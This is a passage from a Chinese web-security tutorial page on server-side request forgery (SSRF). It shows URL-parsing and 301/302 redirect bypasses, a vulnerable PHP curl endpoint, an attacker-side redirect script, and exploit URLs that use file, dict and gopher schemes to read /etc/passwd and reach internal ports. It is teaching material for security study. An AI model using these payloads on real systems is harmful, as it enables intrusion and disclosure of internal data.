d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>,而实际上请求的是127.0.0.1上的内容</p></blockquote> <p><img src="/img/image-20200120223636988.png" alt=""></p> <p>构造CURL的payload：</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">curl</span> -d <span class="token string">&quot;url=http://foo@127.0.0.1:80@www.baidu.com/flag.php&quot;</span> <span class="token string">&quot;http://192.168.43.157&quot;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h4 id="四、301-302跳转绕过">四、301/302跳转绕过 <a href="#四、301-302跳转绕过" class="header-anchor">#</a></h4> <p><strong>条件</strong></p> <blockquote><p>1.程序的合法性检验逻辑为:检查url参数的host是否为内网地址</p> <p>2.使用的是CURL方法，并且CURLOPT_FOLLOWLOCATION为true(即跟随302/301进行跳转)</p></blockquote> <p><strong>可利用的协议：</strong></p> <blockquote><p>http/https ok</p> <p>dict ok</p> <p>gopher ok</p> <p>file no! <a href="https://curl.haxx.se/libcurl/c/CURLOPT_FOLLOWLOCATION.html" target="_blank" rel="noopener noreferrer">原因<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></blockquote> <p><strong>服务端代码：</strong></p> <div class="language-php line-numbers-mode"><pre class="language-php"><code>//ssrf.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>                                                                                                                                                
<span class="token keyword">function</span> <span class="token function">curl</span><span class="token punctuation">(</span><span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">{</span>                                                         
    <span class="token variable">$ch</span> <span class="token operator">=</span> <span class="token function">curl_init</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>                                                       
    <span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_URL</span><span class="token punctuation">,</span> <span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">;</span>                                     
    <span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_HEADER</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>                                     
    <span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_FOLLOWLOCATION</span><span class="token punctuation">,</span> <span class="token boolean constant">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//根据服务器返回 HTTP 头中的 &quot;Location: &quot; 重定向 </span>
    <span class="token function">curl_exec</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">)</span><span class="token punctuation">;</span>                                                     
    <span class="token function">curl_close</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">)</span><span class="token punctuation">;</span>                                                         
<span class="token punctuation">}</span>                                                                            
<span class="token variable">$url</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'url'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>                                                         
<span class="token keyword">print</span> <span class="token variable">$url</span><span class="token punctuation">;</span>                                                                  
<span class="token function">curl</span><span class="token punctuation">(</span><span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</span></code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><p><strong>攻击者的vps：</strong></p> <div class="language-php line-numbers-mode"><pre class="language-php"><code>//302.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>  
<span class="token variable">$schema</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'schema'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$ip</span>     <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'ip'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$port</span>   <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'port'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$query</span>  <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'query'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

<span class="token keyword">echo</span> <span class="token double-quoted-string string">&quot;\n&quot;</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$schema</span> <span class="token punctuation">.</span> <span class="token double-quoted-string string">&quot;://&quot;</span><span class="token punctuation">.</span><span class="token variable">$ip</span><span class="token punctuation">.</span><span class="token double-quoted-string string">&quot;/&quot;</span><span class="token punctuation">.</span><span class="token variable">$query</span><span class="token punctuation">;</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">empty</span><span class="token punctuation">(</span><span class="token variable">$port</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">{</span>  
    <span class="token function">header</span><span class="token punctuation">(</span><span class="token double-quoted-string string">&quot;Location: <span class="token interpolation"><span class="token variable">$schema</span></span>://<span class="token interpolation"><span class="token variable">$ip</span></span>/<span class="token interpolation"><span class="token variable">$query</span></span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
    <span class="token function">header</span><span class="token punctuation">(</span><span class="token double-quoted-string string">&quot;Location: <span class="token interpolation"><span class="token variable">$schema</span></span>://<span class="token interpolation"><span class="token variable">$ip</span></span>:<span class="token interpolation"><span class="token variable">$port</span></span>/<span class="token interpolation"><span class="token variable">$query</span></span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</span></code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br></div></div><p><strong>利用：</strong></p> <div class="language-python line-numbers-mode"><pre class="language-python"><code><span class="token comment">#http/https</span>
http<span class="token punctuation">:</span><span class="token operator">//</span>目标网站HOST<span class="token operator">/</span>ssrf<span class="token punctuation">.</span>php?url<span class="token operator">=</span>http<span class="token punctuation">:</span><span class="token operator">//</span>vps的IP<span class="token operator">/</span><span class="token number">302.</span>php?schema<span class="token operator">=</span>http<span class="token operator">&amp;</span>ip<span class="token operator">=</span><span class="token number">127.0</span><span class="token number">.0</span><span class="token number">.1</span><span class="token operator">&amp;</span>port<span class="token operator">=</span><span class="token number">80</span>
<span class="token comment">#file</span>
http<span class="token punctuation">:</span><span class="token operator">//</span>目标网站HOST<span class="token operator">/</span>ssrf<span class="token punctuation">.</span>php?url<span class="token operator">=</span>http<span class="token punctuation">:</span><span class="token operator">//</span>vps的IP<span class="token operator">/</span><span class="token number">302.</span>php?schema<span class="token operator">=</span><span class="token builtin">file</span><span class="token operator">&amp;</span>ip<span class="token operator">=</span><span class="token number">127.0</span><span class="token number">.0</span><span class="token number">.1</span><span class="token operator">&amp;</span>query<span class="token operator">=</span><span class="token operator">/</span>etc<span class="token operator">/</span>passwd
<span class="token comment">#dict</span>
http<span class="token punctuation">:</span><span class="token operator">//</span>目标网站HOST<span class="token operator">/</span>ssrf<span class="token punctuation">.</span>php?url<span class="token operator">=</span>http<span class="token punctuation">:</span><span class="token operator">//</span>vps的IP<span class="token operator">/</span><span class="token number">302.</span>php?schema<span class="token operator">=</span><span class="token builtin">dict</span><span class="token operator">&amp;</span>ip<span class="token operator">=</span><span class="token number">127.0</span><span class="token number">.0</span><span class="token number">.1</span><span class="token operator">&amp;</span>port<span class="token operator">=</span><span class="token number">29362</span><span class="token operator">&amp;</span>query<span class="token operator">=</span>info
<span class="token comment">#gopher</span>
http<span class="token punctuation">:</span><span class="token operator">//</span>目标网站HOST<span class="token operator">/</span>ssrf<span class="token punctuation">.</span>php?url<span class="token operator">=</span>http<span class="token punctuation">:</span><span class="token operator">//</span>vps的IP<span class="token operator">/</span><span class="token number">302.</span>php?schema<span class="token operator">=</span>gopher<span class="token operator">&amp;</span>ip<span class="token operator">=</span><span class="token number">127.0</span><span class="token number">.0</span><span class="token number">.1</span><span class="token operator">&amp;</span>port<span class="token operator">=</span><span class="token number">2333</span><span class="token operator">&amp;</span>query<span class="token operator">=</span><span class="token number">66666</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><h3 id="总结">总结 <a href="#总结" class="header-anchor">#</a></h3> <div class="language-php line-numbers-mode"><pre class="language-php"><code><span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token function">fsockopen</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token function">curl_exec</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>以上三个函数使用不当会造成SSRF漏洞</p> <p>curl7.43上gopher协议存在%00截断的BUG，v7.49可用</p> <p>file_get_contents()的SSRF，gopher协议不能使用URLencode</p> <p>file_get_contents()的SSRF，gopher协议的302跳转有BUG会导致利用失败</p> <h3 id="更多参考">更多参考 <a href="#更多参考" class="header-anchor">#</a></h3> <p><a href="https://xz.aliyun.com/t/6373" target="_blank" rel="noopener noreferrer">SSRF在有无回显方面的利用及其思考与总结<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.chaitin.cn/gopher-attack-surfaces/" target="_blank" rel="noopener noreferrer">【长亭科技】利用 Gopher 协议拓展攻击面<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/web/logical.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        常见逻辑漏洞
      </a></span> <span class="next"><a href="/knowledge/web/same-origin-policy.html">
        同源策略和域安全
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/73.6dd6c980.js" defer></script>
  </body>
</html>